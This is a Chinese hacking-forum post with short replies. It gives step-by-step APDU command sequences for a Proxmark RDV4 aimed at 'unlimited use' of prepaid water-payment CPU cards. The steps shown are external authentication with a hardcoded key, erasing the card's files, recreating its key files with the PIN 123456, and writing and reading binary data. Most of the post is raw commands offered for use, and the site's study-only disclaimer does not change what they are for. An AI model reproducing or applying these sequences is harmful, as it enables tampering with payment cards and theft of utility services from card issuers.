村长 发表于 2022-1-28 22:21:06

【HR】CPU水卡指令解决

需要有懂的的人才可以
RDV4
#【HR】水卡CPU卡无限使用#
关注【NFC】

指令:
    uint8_t uSelectProperty[]={0x00,0xA4,0x00,0x0,0x02,0x3F,0x01};//选择文件目录3F01
    uint8_t uSelectReadBinFile[]={0x0,0xA4,0x00,0x00,0x02,0x00,0x04};//选择文件0004
    uint8_t uSelectReadBinContent[]={0x00,0xB0,0x00,0x00,0x00,0x10};
也就是
00A40000023F01//选文件夹
00A40000020004//选文件
0020000003123456//口令验证
00B000000010//读文件
分析成功1:
00A40000023F01//选择ADF
80E00000073F010095FAFFFF//建立秘钥文件
80D401000DF9F0F0AA88FFFFFFFFFFFFFFFF//写入外部认证秘钥
80D40100083AF0EFAA88123456//写入口令秘钥
80E0000107280010FAFAFFFF//建立应用目录下二进制文件
00D6000002AABB//写二进制文件内容AABB
0020000003123456//口令认证
00B081000010//读出内容
考虑:读出内容的报文,我是建立的0001 所以读出是8100,陈强做的是0000的话,我需要控制我建立的二进制文件是0000,所以
修改一下,秘钥文件是0001,二进制文件是0000吧
开始(圆满成功):
00A40000023F01//选择应用目录3F01
0084000004 //获取随机数
008200000870C16867CC059179//外部认证
800E000000 //擦除文件 文件夹还在
00A40000023F01
80E00001073F010095FAFFFF//创建秘钥文件0001
80D401000DF9F0F0AA88FFFFFFFFFFFFFFFF
80D40100083AF0EFAA88123456
80E0000007280010FAFAFFFF//创建二进制文件0000
00D6000002AABB//写入
0020000003123456
00B000000010

00A40000023F01//选择应用目录3F01
0084000004 //获取随机数
008200000870C16867CC059179//外部认证
800E000000 //擦除文件 文件夹还在
00A40000023F01
80E00001073F010095FAFFFF//创建秘钥文件0001
80D401000DF9F0F0AA88FFFFFFFFFFFFFFFF
80D40100083AF0EFAA88123456
80E00000 07280010FAFAFFFF//创建二进制文件0000
00D6000002AABB//写入
0020000003123456
00B000000010

80E0000407280010FAFAFFFF//创建二进制文件0004
00D6000002CCDD//写CCDD

80E0000307280010FAFAFFFF//创建二进制文件0003
00D60000024433//写CCDD

可以了!
你要读,就需要先选择!用 00A4 00就表示用ID定位!

00A40000023F01//选文件夹
00A40000020004//选文件 可以改最后的4为3 就可以读3号文件 但是不能读0号
0020000003123456//口令验证
00B000000010//读文件

草稿:

建立:80E0 3F01(文件标识)0D(LC)38(文件夹)0600(空间)F0FA(权)95(ID)FFFF 1122334455
选择:00A4 00(用文件标识点名)00 02(LC) 3F01//选择应用目录3F01或者用下面的
      00A4 04(用目录名称点名)00 05(LC) 1122334455//
      00A4 00                00 02   0004
      
      80E0 0004          07 28 0010FAFAFFFF//创建二进制文件
      80E0 0000(文件ID) 07 28(二进制)0010 FAFAFFFF      

http://cdn.u1.huluxia.com/g4/M03/FF/A3/rBAAdmGVwBWADfP7AAKNKBsr2FM923.jpghttp://cdn.u1.huluxia.com/g4/M03/FF/A3/rBAAdmGVwBaACKP9AAFZb2H3uWo405.jpghttp://cdn.u1.huluxia.com/g4/M03/FF/A3/rBAAdmGVwBeAPOejAAH-NQovmo0645.jpghttp://cdn.u1.huluxia.com/g4/M03/FF/A3/rBAAdmGVwBiAGQkXAAMDVTAuRH8547.jpghttp://cdn.u1.huluxia.com/g4/M03/FF/A3/rBAAdmGVwBmAORiBAAEkS5WPBes667.jpghttp://cdn.u1.huluxia.com/g4/M03/FF/A3/rBAAdmGVwBqAavDMAAJsNEyERBM308.jpghttp://cdn.u1.huluxia.com/g4/M00/0E/CE/rBAAdmGjal2AZ_oXAAGuMvWxwfs485.jpghttp://cdn.u1.huluxia.com/g4/M00/0E/CE/rBAAdmGjal-AOMy3AAHDqblmjOA759.jpg

千百渡 发表于 2022-1-29 15:18:27

村长帖子非常给力

半度微凉 发表于 2022-1-29 21:45:17

秀起来~

liqiang24 发表于 2022-1-31 21:59:00

为了三千积分!

千面萌萌 发表于 2022-1-31 22:43:43

介是神马?!!
页: [1]
查看完整版本: 【HR】CPU水卡指令解决

村长黑科技是专业提供项目资源的服务的村长黑科技平台,如合购网赚项目、引流推广软件、软件程序开发等项目就选村长黑科
技平台参与或发布项目定制各种软件就来村长黑科技平台

本站中所有被研究的素材与信息全部来源于互联网,版权争议与本站无关。本站所发布的任何软件的破解分析文章、破解分析视频、补丁、注册机和注册信息,

仅限用于学习和研究软件安全的目的。您必须在下载后的24个小时之内,从您的电脑中彻底删除上述内容。学习破解分析技术是为了更好的完善软件可能存在的不安全因素,提升软件安全意识。所以您如果喜欢某程序,

请购买注册正版软件,获得正版优质服务!不允许将上述内容私自传播、销售或者其他任何非法用途!否则,产生任何法律责任,一切后果请用户自负,与本网站无关!如有侵权或非法用途请举报!请发送到邮箱:cxphj8@foxmail.com

《意见反馈》或《截图指定页面备注》发送到邮件,收到后24小时内删除,禁止用户学习使用关掉用户【学习使用权】!